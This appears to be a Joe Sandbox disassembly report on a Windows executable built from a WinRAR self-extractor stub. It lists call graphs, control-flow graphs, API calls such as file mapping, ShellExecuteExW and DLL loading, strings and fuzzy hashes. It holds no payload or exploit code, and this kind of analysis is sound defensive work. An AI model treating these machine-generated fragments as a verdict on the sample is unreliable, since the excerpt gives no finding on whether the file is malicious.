24386->24273 24386->24338 24388 28bd7a SetDlgItemTextW 24387->24388 24452 2712f1 GetDlgItem ShowWindow 24388->24452 24389 28baed 24392 28baff 24389->24392 24393 28baf4 GetLastError 24389->24393 24394 28bbf4 24390->24394 24396 27959a 80 API calls 24392->24396 24393->24392 24542 28b425 SHGetMalloc 24394->24542 24395 28bd8c SetDlgItemTextW GetDlgItem 24399 28bda9 GetWindowLongW SetWindowLongW 24395->24399 24400 28bdc1 
24395->24400 24396->24348 24402 28bd3d 24398->24402 24399->24400 24453 28c73f 24400->24453 24401 28bc10 24543 28b425 SHGetMalloc 24401->24543 24406 28bc1c 24544 28b425 SHGetMalloc 24406->24544 24407 28c73f 97 API calls 24409 28bddd 24407->24409 24478 28da52 24409->24478 24410 28bc28 24545 27f3fa 82 API calls 2 library calls 24410->24545 24411 28bccb 24411->24361 24417 28bce1 UnmapViewOfFile CloseHandle 24411->24417 24415 28bc3f MapViewOfFile 24415->24418 24416 28c73f 97 API calls 24422 28be03 24416->24422 24417->24361 24418->24411 24419 28bcb7 Sleep 24418->24419 24419->24411 24419->24418 24420 28be2c 24546 2712d3 GetDlgItem EnableWindow 24420->24546 24422->24420 24424 28c73f 97 API calls 24422->24424 24423->24273 24423->24295 24424->24420 24426 27131f 24425->24426 24427 271378 24425->24427 24428 271385 24426->24428 24551 27e2e8 62 API calls 2 library calls 24426->24551 24552 27e2c1 GetWindowLongW SetWindowLongW 24427->24552 24428->24263 24428->24264 24428->24265 24431 271341 24431->24428 24432 271354 GetDlgItem 24431->24432 24432->24428 24433 271364 24432->24433 24433->24428 24434 27136a SetWindowTextW 24433->24434 24434->24428 24438 27a0bb 24435->24438 24436 27a14c 24437 27a2b2 8 API calls 24436->24437 24439 27a175 24436->24439 24437->24439 24438->24436 24438->24439 24553 27a2b2 24438->24553 24439->24324 24439->24325 24441->24336 24443 279678 24442->24443 24444 2796d5 CreateFileW 24443->24444 24445 2796c9 24443->24445 24444->24445 24446 27971f 24445->24446 24447 27bb03 GetCurrentDirectoryW 24445->24447 24446->24389 24448 279704 24447->24448 24448->24446 24449 279708 CreateFileW 24448->24449 24449->24446 24450->24370 24451->24382 24452->24395 24454 28c749 __EH_prolog 24453->24454 24455 28bdcf 24454->24455 24585 28b314 24454->24585 24455->24407 24458 28b314 ExpandEnvironmentStringsW 24462 28c780 _wcslen _wcsrchr 24458->24462 24459 28ca67 SetWindowTextW 24459->24462 24462->24455 24462->24458 24462->24459 24465 28c855 SetFileAttributesW 24462->24465 24471 28cc31 

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                    • Part of subcall function 00280863: GetModuleHandleW.KERNEL32(kernel32), ref: 0028087C
                                                                                    • Part of subcall function 00280863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0028088E
                                                                                    • Part of subcall function 00280863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002808BF
                                                                                    • Part of subcall function 0028A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0028A655
                                                                                    • Part of subcall function 0028AC16: OleInitialize.OLE32(00000000), ref: 0028AC2F
                                                                                    • Part of subcall function 0028AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0028AC66
                                                                                    • Part of subcall function 0028AC16: SHGetMalloc.SHELL32(002B8438), ref: 0028AC70
                                                                                  • GetCommandLineW.KERNEL32 ref: 0028DF5C
                                                                                  • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0028DF83
                                                                                  • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0028DF94
                                                                                  • UnmapViewOfFile.KERNEL32(00000000), ref: 0028DFCE
                                                                                    • Part of subcall function 0028DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0028DBF4
                                                                                    • Part of subcall function 0028DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0028DC30
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0028DFD7
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,002CEC90,00000800), ref: 0028DFF2
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxname,002CEC90), ref: 0028DFFE
                                                                                  • GetLocalTime.KERNEL32(?), ref: 0028E009
                                                                                  • _swprintf.LIBCMT ref: 0028E048
                                                                                  • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0028E05A
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0028E061
                                                                                  • LoadIconW.USER32(00000000,00000064), ref: 0028E078
                                                                                  • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0028E0C9
                                                                                  • Sleep.KERNEL32(?), ref: 0028E0F7
                                                                                  • DeleteObject.GDI32 ref: 0028E130
                                                                                  • DeleteObject.GDI32(?), ref: 0028E140
                                                                                  • CloseHandle.KERNEL32 ref: 0028E183
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
                                                                                  • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp$xz,
                                                                                  • API String ID: 3049964643-1721236633
                                                                                  • Opcode ID: 435447d7ece7f0af81db1c5d5e0d8e87623a41bb5c8b565e76f424a492f5ad31
                                                                                  • Instruction ID: 4ae34ebee2e680d49fb812e368a3a2f262be829a787d9c3ec86d70d7ee1e084b
                                                                                  • Opcode Fuzzy Hash: 435447d7ece7f0af81db1c5d5e0d8e87623a41bb5c8b565e76f424a492f5ad31
                                                                                  • Instruction Fuzzy Hash: 5E61EF75925205ABD720BF74FC4DF2B77ACAB46704F04042AF909921E2DF749D68CB62

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 802 28a6c2-28a6df FindResourceW 803 28a7db 802->803 804 28a6e5-28a6f6 SizeofResource 802->804 806 28a7dd-28a7e1 803->806 804->803 805 28a6fc-28a70b LoadResource 804->805 805->803 807 28a711-28a71c LockResource 805->807 807->803 808 28a722-28a737 GlobalAlloc 807->808 809 28a73d-28a746 GlobalLock 808->809 810 28a7d3-28a7d9 808->810 811 28a7cc-28a7cd GlobalFree 809->811 812 28a74c-28a76a call 290320 809->812 810->806 811->810 816 28a76c-28a78e call 28a626 812->816 817 28a7c5-28a7c6 GlobalUnlock 812->817 816->817 822 28a790-28a798 816->822 817->811 823 28a79a-28a7ae GdipCreateHBITMAPFromBitmap 822->823 824 28a7b3-28a7c1 822->824 823->824 825 28a7b0 823->825 824->817 825->824
                                                                                  APIs
                                                                                  • FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0028B73D,00000066), ref: 0028A6D5
                                                                                  • SizeofResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A6EC
                                                                                  • LoadResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A703
                                                                                  • LockResource.KERNEL32(00000000,?,?,?,0028B73D,00000066), ref: 0028A712
                                                                                  • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0028B73D,00000066), ref: 0028A72D
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 0028A73E
                                                                                  • CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0028A762
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0028A7C6
                                                                                    • Part of subcall function 0028A626: GdipAlloc.GDIPLUS(00000010), ref: 0028A62C
                                                                                  • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0028A7A7
                                                                                  • GlobalFree.KERNEL32(00000000), ref: 0028A7CD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
                                                                                  • String ID: Fjun($PNG
                                                                                  • API String ID: 211097158-1265109434
                                                                                  • Opcode ID: 5c061124ab28b602cb79ae2b28fb227a386bf7cf73c0727806ff6408e05a7067
                                                                                  • Instruction ID: f416bca129d65598f7ec7ec6207699de9aebc73d1fa134a2099c2ba5c623678b
                                                                                  • Opcode Fuzzy Hash: 5c061124ab28b602cb79ae2b28fb227a386bf7cf73c0727806ff6408e05a7067
                                                                                  • Instruction Fuzzy Hash: 2E318479611302AFE710AF61EC4CD2BFBB9FF85750B14052AF905822A0EF31DD659B91

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 1032 27a69b-27a6bf call 28ec50 1035 27a727-27a730 FindNextFileW 1032->1035 1036 27a6c1-27a6ce FindFirstFileW 1032->1036 1037 27a742-27a7ff call 280602 call 27c310 call 2815da * 3 1035->1037 1038 27a732-27a740 GetLastError 1035->1038 1036->1037 1039 27a6d0-27a6e2 call 27bb03 1036->1039 1043 27a804-27a811 1037->1043 1040 27a719-27a722 1038->1040 1047 27a6e4-27a6fc FindFirstFileW 1039->1047 1048 27a6fe-27a707 GetLastError 1039->1048 1040->1043 1047->1037 1047->1048 1050 27a717 1048->1050 1051 27a709-27a70c 1048->1051 1050->1040 1051->1050 1053 27a70e-27a711 1051->1053 1053->1050 1055 27a713-27a715 1053->1055 1055->1040
                                                                                  APIs
                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6C4
                                                                                    • Part of subcall function 0027BB03: _wcslen.LIBCMT ref: 0027BB27
                                                                                  • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6F2
                                                                                  • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A6FE
                                                                                  • FindNextFileW.KERNEL32(?,?,?,?,?,?,0027A592,000000FF,?,?), ref: 0027A728
                                                                                  • GetLastError.KERNEL32(?,?,?,?,0027A592,000000FF,?,?), ref: 0027A734
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                  • String ID:
                                                                                  • API String ID: 42610566-0
                                                                                  • Opcode ID: ef5d01be2b89f185642678dd276335279d37c23af9759ce7e21be5c8901821d2
                                                                                  • Instruction ID: 6e13eef37a53d48695453751aea1b5467610540cde70970322a735b77cf5dab8
                                                                                  • Opcode Fuzzy Hash: ef5d01be2b89f185642678dd276335279d37c23af9759ce7e21be5c8901821d2
                                                                                  • Instruction Fuzzy Hash: B1417C76910515ABCB25DF64CC88AEEF7B8BB89350F104196F95DE3240D7346EA4CF90
                                                                                  APIs
                                                                                  • GetCurrentProcess.KERNEL32(?,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002,00000000), ref: 00297E0F
                                                                                  • TerminateProcess.KERNEL32(00000000,?,00297DC4,?,002AC300,0000000C,00297F1B,?,00000002,00000000), ref: 00297E16
                                                                                  • ExitProcess.KERNEL32 ref: 00297E28
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                  • String ID:
                                                                                  • API String ID: 1703294689-0
                                                                                  • Opcode ID: 35d283e64b1211114f11e68a5ecf0bca65030127c410b7182118c9715798ea24
                                                                                  • Instruction ID: 6d7076bfe99b81307df46f0a0373c662a94f85579a789a677559123e0392be17
                                                                                  • Opcode Fuzzy Hash: 35d283e64b1211114f11e68a5ecf0bca65030127c410b7182118c9715798ea24
                                                                                  • Instruction Fuzzy Hash: 07E0B631024148AFCF16AF64ED4EA5A7F6AEB51341F004454F9598A132CF36DE62CA90
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 853d4dbbece4e12f4eb4f769869045622c600724596ab2e08e71b31844df60dd
                                                                                  • Instruction ID: 0d7066d80da4aaeba4038ff938bd08003fa3bc05847df96f770cbff51e95b5f6
                                                                                  • Opcode Fuzzy Hash: 853d4dbbece4e12f4eb4f769869045622c600724596ab2e08e71b31844df60dd
                                                                                  • Instruction Fuzzy Hash: 49824070964246AEDF15DF74C899BFAB7B9BF05300F08C1B9E84D9B142DB305AA4CB61
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: H_prolog
                                                                                  • String ID:
                                                                                  • API String ID: 3519838083-0
                                                                                  • Opcode ID: 51c87229d09a1678dfe32aa0d0efcbdd53047c6c6e91e4574f117eebd6d6e082
                                                                                  • Instruction ID: 0b3683c0863a5c79ec672c0299bbd05098798df5123ffd03a433fb163eaf8fd6
                                                                                  • Opcode Fuzzy Hash: 51c87229d09a1678dfe32aa0d0efcbdd53047c6c6e91e4574f117eebd6d6e082
                                                                                  • Instruction Fuzzy Hash: EDD127756193818FDB10EF28C88475BBBE1BF89308F08456DF8899B782D774E924CB56
                                                                                  APIs
                                                                                  • __EH_prolog.LIBCMT ref: 0028B7E5
                                                                                    • Part of subcall function 00271316: GetDlgItem.USER32(00000000,00003021), ref: 0027135A
                                                                                    • Part of subcall function 00271316: SetWindowTextW.USER32(00000000,002A35F4), ref: 00271370
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028B8D1
                                                                                  • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0028B8EF
                                                                                  • IsDialogMessageW.USER32(?,?), ref: 0028B902
                                                                                  • TranslateMessage.USER32(?), ref: 0028B910
                                                                                  • DispatchMessageW.USER32(?), ref: 0028B91A
                                                                                  • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 0028B93D
                                                                                  • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 0028B960
                                                                                  • GetDlgItem.USER32(?,00000068), ref: 0028B983
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028B99E
                                                                                  • SendMessageW.USER32(00000000,000000C2,00000000,002A35F4), ref: 0028B9B1
                                                                                    • Part of subcall function 0028D453: _wcschr.LIBVCRUNTIME ref: 0028D45C
                                                                                    • Part of subcall function 0028D453: _wcslen.LIBCMT ref: 0028D47D
                                                                                  • SetFocus.USER32(00000000), ref: 0028B9B8
                                                                                  • _swprintf.LIBCMT ref: 0028BA24
                                                                                    • Part of subcall function 00274092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 002740A5
                                                                                    • Part of subcall function 0028D4D4: GetDlgItem.USER32(00000068,002CFCB8), ref: 0028D4E8
                                                                                    • Part of subcall function 0028D4D4: ShowWindow.USER32(00000000,00000005,?,?,?,0028AF07,00000001,?,?,0028B7B9,002A506C,002CFCB8,002CFCB8,00001000,00000000,00000000), ref: 0028D510
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0028D51B
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002A35F4), ref: 0028D529
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D53F
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0028D559
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D59D
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0028D5AB
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0028D5BA
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0028D5E1
                                                                                    • Part of subcall function 0028D4D4: SendMessageW.USER32(00000000,000000C2,00000000,002A43F4), ref: 0028D5F0
                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 0028BA68
                                                                                  • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 0028BA90
                                                                                  • GetTickCount.KERNEL32 ref: 0028BAAE
                                                                                  • _swprintf.LIBCMT ref: 0028BAC2
                                                                                  • GetLastError.KERNEL32(?,00000011), ref: 0028BAF4
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 0028BB43
                                                                                  • _swprintf.LIBCMT ref: 0028BB7C
                                                                                  • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 0028BBD0
                                                                                  • GetCommandLineW.KERNEL32 ref: 0028BBEA
                                                                                  • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 0028BC47
                                                                                  • ShellExecuteExW.SHELL32(0000003C), ref: 0028BC6F
                                                                                  • Sleep.KERNEL32(00000064), ref: 0028BCB9
                                                                                  • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 0028BCE2
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0028BCEB
                                                                                  • _swprintf.LIBCMT ref: 0028BD1E
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028BD7D
                                                                                  • SetDlgItemTextW.USER32(?,00000065,002A35F4), ref: 0028BD94
                                                                                  • GetDlgItem.USER32(?,00000065), ref: 0028BD9D
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0028BDAC
                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0028BDBB
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028BE68
                                                                                  • _wcslen.LIBCMT ref: 0028BEBE
                                                                                  • _swprintf.LIBCMT ref: 0028BEE8
                                                                                  • SendMessageW.USER32(?,00000080,00000001,?), ref: 0028BF32
                                                                                  • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 0028BF4C
                                                                                  • GetDlgItem.USER32(?,00000068), ref: 0028BF55
                                                                                  • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 0028BF6B
                                                                                  • GetDlgItem.USER32(?,00000066), ref: 0028BF85
                                                                                  • SetWindowTextW.USER32(00000000,002BA472), ref: 0028BFA7
                                                                                  • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 0028C007
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028C01A
                                                                                  • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 0028C0BD
                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0028C197
                                                                                  • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 0028C1D9
                                                                                    • Part of subcall function 0028C73F: __EH_prolog.LIBCMT ref: 0028C744
                                                                                  • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 0028C1FD
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1673798644.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                                                                  • Associated: 00000000.00000002.1673741966.0000000000270000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673879987.00000000002A3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002AE000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002B5000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673904902.00000000002D2000.00000004.00000001.01000000.00000003.sdmp
                                                                                  • Associated: 00000000.00000002.1673984174.00000000002D3000.00000002.00000001.01000000.00000003.sdmp
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_270000_OisrvsB6Ea.jbxd
                                                                                  Similarity
                                                                                  • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l_wcschr
                                                                                  • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$PDu<($STARTDLG$^($__tmp_rar_sfx_access_check_%u$h($winrarsfxmappingfile.tmp$Q*
                                                                                  • API String ID: 3829768659-217290775
                                                                                  • Opcode ID: 0d4149731f94df3587dec9153d9ceeb5b6637c673713a04145812671b0bc60f0
                                                                                  • Instruction ID: 4246a07d9e7c600d1d3b293350664a9ec174faf16672d24c4a2dff785f5ed1c2
                                                                                  • Opcode Fuzzy Hash: 0d4149731f94df3587dec9153d9ceeb5b6637c673713a04145812671b0bc60f0
                                                                                  • Instruction Fuzzy Hash: 7142E274D66245BAEB22AB74EC4EFBE377CAB02700F14415AF548A60D2CB745E64CF21

                                                                                  Control-flow Graph

                                                                                  control_flow_graph 269 280863-280886 call 28ec50 GetModuleHandleW 272 280888-28089f GetProcAddress 269->272 273 2808e7-280b48 269->273 274 2808b9-2808c9 GetProcAddress 272->274 275 2808a1-2808b7 272->275 276 280b4e-280b59 call 2975fb 273->276 277 280c14-280c40 GetModuleFileNameW call 27c29a call 280602 273->277 278 2808cb-2808e0 274->278 279 2808e5 274->279 275->274 276->277 287 280b5f-280b8d GetModuleFileNameW CreateFileW 276->287 293 280c42-280c4e call 27b146 277->293 278->279 279->273 288 280c08-280c0f CloseHandle 287->288 289 280b8f-280b9b SetFilePointer 287->289 288->277 289->288 291 280b9d-280bb9 ReadFile 289->291 291->288 295 280bbb-280be0 291->295 298 280c7d-280ca4 call 27c310 GetFileAttributesW 293->298 299 280c50-280c5b call 28081b 293->299 297 280bfd-280c06 call 280371 295->297 297->288 306 280be2-280bfc call 28081b 297->306 309 280cae 298->309 310 280ca6-280caa 298->310 299->298 308 280c5d-280c7b CompareStringW 299->308 306->297 308->298 308->310 313 280cb0-280cb5 309->313 310->293 312 280cac 310->312 312->313 314 280cec-280cee 313->314 315 280cb7 313->315 316 280dfb-280e05 314->316 317 280cf4-280d0b call 27c2e4 call 27b146 314->317 318 280cb9-280ce0 call 27c310 GetFileAttributesW 315->318 328 280d0d-280d6e call 28081b * 2 call 27e617 call 274092 call 27e617 call 28a7e4 317->328 329 280d73-280da6 call 274092 AllocConsole 317->329 323 280cea 318->323 324 280ce2-280ce6 318->324 323->314 324->318 326 280ce8 324->326 326->314 335 280df3-280df5 ExitProcess 328->335 334 280da8-280ded GetCurrentProcessId AttachConsole call 293e13 GetStdHandle WriteConsoleW Sleep FreeConsole 329->334 329->335 334->335
                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(kernel32), ref: 0028087C
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0028088E
                                                                                  • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 002808BF
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00280B69
                                                                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00280B83
                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00280B93
                                                                                  • ReadFile.KERNEL32(00000000,?,00007FFE,|<*,00000000), ref: 00280BB1
                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00280C09
                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00280C1E
                                                                                  • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,|<*,?,00000000,?,00000800), ref: 00280C72
                                                                                  • GetFileAttributesW.KERNELBASE(?,?,|<*,00000800,?,00000000,?,00000800), ref: 00280C9C
                                                                                  • GetFileAttributesW.KERNEL32(?,?,D=*,00000800), ref: 00280CD8
                                                                                    • Part of subcall function 0028081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00280836
                                                                                    • Part of subcall function 0028081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0027F2D8,Crypt32.dll,00000000,0027F35C,?,?,0027F33E,?,?,?), ref: 00280858
                                                                                  • _swprintf.LIBCMT ref: 00280D4A
                                                                                  • _swprintf.LIBCMT ref: 00280D96
